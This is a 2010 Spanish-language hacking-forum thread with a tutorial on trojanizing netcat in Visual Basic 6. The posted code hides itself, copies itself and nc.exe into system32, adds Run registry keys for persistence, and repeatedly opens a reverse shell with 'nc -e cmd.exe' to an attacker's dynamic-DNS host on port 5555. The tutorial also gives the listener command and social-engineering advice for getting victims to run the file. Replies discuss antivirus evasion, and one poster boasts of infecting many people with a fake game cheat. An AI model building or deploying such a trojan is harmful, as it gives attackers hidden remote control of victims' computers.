elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-  (Leído 8,077 veces)
MagoMagico
Este usuario ha sido baneado

Desconectado Desconectado

Mensajes: 3



Ver Perfil
[Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« en: 16 Marzo 2010, 17:32 pm »

Ante que todo , este es mi primir tutorial & aporte , para elhacker.net , y mi primir post en el foro , me presento , soy MagoMagico.

De antemano al tutorial , doy aviso , que és necesario utilizar la ingenieria social.-

Indice :

1)Introducción.-
2)Creando las aplicaciones & Registrando un no-ip.-
3)Ingenieria social.-
4)Dejando puerto a la escucha , para la conexion del netcat.-

                                           Intruducción

Antes que todo , quiero advertir,que deben tener primero que todo un poco de conocimientos de los que és msdos , ya que no sabran que hacer luego de obtener la shell remota , Tambien viene bien, un poco de conocimientos de como usar el netcat , y tambien de visualbasic,eso facilitaria la tarea.
Este manual , no esta basado en linux,si no que esta echo para los que trabajan en windows.
Al final del manual ,dejare referencias,de tutoriales de netcat,visualbasic,No-ip,msdos,que pueden servir.-




Armandonos con las herramientas :

0x01: Necesitamos el nc.exe .

Acá tienen la descarga directa.

Descarga nc

El nc.exe ,lo pondremos en la ruta Windows/system32.-

-~-

Después, para compilar , nuestro proyecto,que va a hacer la asaña , necesitamos el visualbasic 6.0 , mejor si tienen el visual studio,pero tranquilamente pueden usar uno portable,busquen bien , porque muchos de los portables,no andan con eficiencia, y casi siempre fallan , al compilar.-
Aclaración : Nuestra aplicación, va a ser indetectable,por cualquier antivirus.-

Pues esto es todo lo que necesitamos,empezemos.-

                                Creando archivo visualbasic.

abrimos el visualbasic, y creamos un proyecto de tipo standar EXE



Colocamos un timer , en el proyecto.
Buscan la propiedad enabled y la cambian por false.-

Bueno , en el form load del proyecto , ponemos el siguiente codigo.-



Código:
Private Sub Form_Load()
Timer1.Interval = 1000 ' Ajustamos el tiempo del timer en MS.
Form1.Visible = False ' Ocultamos la ventana del formulario
Timer1.Enabled = True ' Activamos el timer.
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe"  'Copiamos el nc , que va a estar en la carpeta del proyecto a system32.
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
' Copiamos el proyecto que va a conectar a nuestro netcat luego del reinicio del 'ordenador.
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe  /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe  /t REG_SZ /f"
'Aqui hacmos las entradas al registro , para que se autoinicie proyectod.exe,que vamos a crear a continuación.-
Form1.Hide ' Ocultamos form
App.TaskVisible = False ' Hacemos invisible la aplicacion en el administrador de tareas.
End Sub

En el timer ,ponemos lo siguiente.-

Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe NOIP 5555"), vbHide
End Sub


Referencias NO-IP : Aqui va, nuestra no-ip,que remplazara a nuestra ip , con un conjunto de letras que identificaran nuestra ip , para que cuando cambie nuestra ip ,no se nos joda la aplicación,para esto , vamos a no-ip.com , nos registramos y aderimos un host que sustituya tu ip , si no sabeis como crear un no-ip , visita las referencias que dejo al final del tutorial.-


Yo ya tengo mi no-ip , que es framework.sytes.net,que en este caso , el codigo del timer quedaria asi.

Código:
Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
' Establecemos conexion con nuestro pc , a travez del no-ip y el puerto 5555
'Con el vbhide,ocultamos la ventana del msdos.-
End Sub

Nuestro primer proyecto terminado quedaria algo parecido a esto.-

Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
FileCopy App.Path & "\nc.exe", Environ("systemroot") & "\system32\nc.exe"
FileCopy App.Path & "\proyectod.exe", Environ("systemroot") & "\system32\proyectod.exe"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v c:\windows\system32\proyectod.exe  /t REG_SZ /f"
Shell Environ("comspec") & " /c Reg Add  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v d:\windows\system32\proyectod.exe  /t REG_SZ /f"
Form1.Hide
App.TaskVisible = False
End Sub

Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub

Cambian mi no-ip , por el suyo. okok ! vamos a crear el proyectod.exe

abrimos un nuevo proyecto standar .exe, ponemos un timer en el proyecto y en el codigo ponemos lo siguiente :

Código:
Private Sub Form_Load()
Timer1.Interval = 1200
Form1.Visible = False
Timer1.Enabled = True
Form1.Hide
App.TaskVisible = False
End Sub

Private Sub Timer1_Timer()
Shell ("cmd /c nc -e cmd.exe framework.sytes.net 5555"), vbHide
End Sub

Compilamos los 2 proyectos, el primero lo guardamos con el nombre que querramos , el segundo , como proyectod.exe

Bien,hacemos una carpeta, y metemos todo ahi adentro , y ponemos el nc.exe adentro de esa carpeta.-

Quedaría algo así. :



Ok, eso lo ponemos en un .rar y esta listo para enviar.-

3)Ahora viene lo que es ingenieria social, teneis que hacer que tu victima habra el archivo abrir.exe , que es el que va a copiar el nc.exe en system32 , va a cargar las entradas al registro , tambien establecer conexiones y copiar el proyectod.exe.

Una vez que habra abrir.exe, ya esta infectado podemos obtener shell remota de la siguiente forma..


4)Dejando puerto a la escucha.

Vamos a inicio->ejecutar->cmd

ponemos el siguiente comando ...

nc -l -p 5555 y damos enter.-

* Yo puse en la imagen , 7500 , porque es el puerto que uso.-




Ahora, cuando tienen esta shell,se les pueden venir mil cosas por la cabeza, si saben usar el msdos ,o saben programación en batch, pues si no saben como usar esta shell , lean las referencias , y luego sabran.-

Referencias :

Creando una no-ip :

http://www.gamerzlove.com/f54/guia-como-crear-un-no-ip-129455/

Tutorial de visualbasic :

http://www.elguruprogramador.com.ar/tutoriales/visual-basic

Tutorial netcat para noobs.

http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_netcat_pagravera_newbies-t65764.0.html

La programación en entorno msdos y batch.

http://www.elhacker.net/ProgramacionBat.htm

Mi despedida :

Bueno,espero que les guste,cualquier duda,critica,advertencia,amenaza en este topico , o bien un MP.

Me despido att : MagoMagico


« Última modificación: 16 Marzo 2010, 17:37 pm por MagoMagico » En línea

>~Magic Magician~<
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #1 en: 16 Marzo 2010, 17:46 pm »

mmm Pero en la maquina victima tiene que estar el nc
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
MagoMagico
Este usuario ha sido baneado

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #2 en: 16 Marzo 2010, 18:01 pm »

El programa a enviar,tiene el nc.exe, en la carpeta, ese nc con el codigo vb se autocopia en system32 , donde luego se ejecuta.

Salu2.
En línea

>~Magic Magician~<
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #3 en: 16 Marzo 2010, 18:49 pm »

xD y como se supone que se enviar?
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
MagoMagico
Este usuario ha sido baneado

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #4 en: 16 Marzo 2010, 19:33 pm »

xD y como se supone que se enviar?

Se supone que se usa la ingenieria social ,para enviar los archivos.

Saludos,MAGOMAGICO.
En línea

>~Magic Magician~<
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #5 en: 16 Marzo 2010, 19:37 pm »

1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.833



Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #6 en: 16 Marzo 2010, 20:01 pm »

Tutorial, basico entendible  bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*
En línea

https://www.latotatv.com
Código:
La Tota TV
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #7 en: 16 Marzo 2010, 22:34 pm »

umm esa bien, pero tienes que tener en cuenta que casi todos los AVs detectan el netcat, y aunque lo consigas indetectabilizar (no se si existe esta palabra xD) la mayoria de de AVs detectaran que se intenta copiar a si mismo en otra carpeta, con lo que saltara la alarma.

Suerte
En línea

PHAMTOM

Desconectado Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF


Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #8 en: 16 Marzo 2010, 22:49 pm »

1. A de ser uno muy idiota para recibir 2 archivos y más con nombre nc.exe
2. Nunca he visto algo como esto, se enviand 2 archivo. Debe ser 1 archivo por lo menos.


1)Los hay,esta llenos de idiotas.. eehh man te paso un cheat , un ok recivi y logre infectar a muchos con este archivo.
2)Que un archivo por lo menos?podes mandar un rar,  y que ejecute uno y listo.-

Tutorial, basico entendible  bueno para los que recien emoiezan, pero hay que poner algo claro el NC es detectado por casi todos los AVS, lo cual primero tendrias dejar 100% FUD el nc y de ahi realizar todo el procedur*

Tengo el nod 32 y no lo detectó.

El tutorial es para gente,que no tiene muchos conocimientos y recien se inician en el tema hacking,se supone que esta en hacking basico .

PHAMTOM
En línea

Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.833



Ver Perfil
Re: [Tutorial]Troyanizando nc con visualbasic & obteniendo remote shell.-
« Respuesta #9 en: 17 Marzo 2010, 02:37 am »

Citar
Tengo el nod 32 y no lo detectó.
Yo tengo el nod 32 y lo detecta, segundo esto del netcat esta mas que hablado, tercero deberia ir a programacion Vbs o en Analisis malware.

Cosas Claras, Cosas Simples.

En línea

https://www.latotatv.com
Código:
La Tota TV
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Remote Shell (Masm32)
ASM
Vaagish 7 4,124 Último mensaje 15 Mayo 2014, 22:55 pm
por xv0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines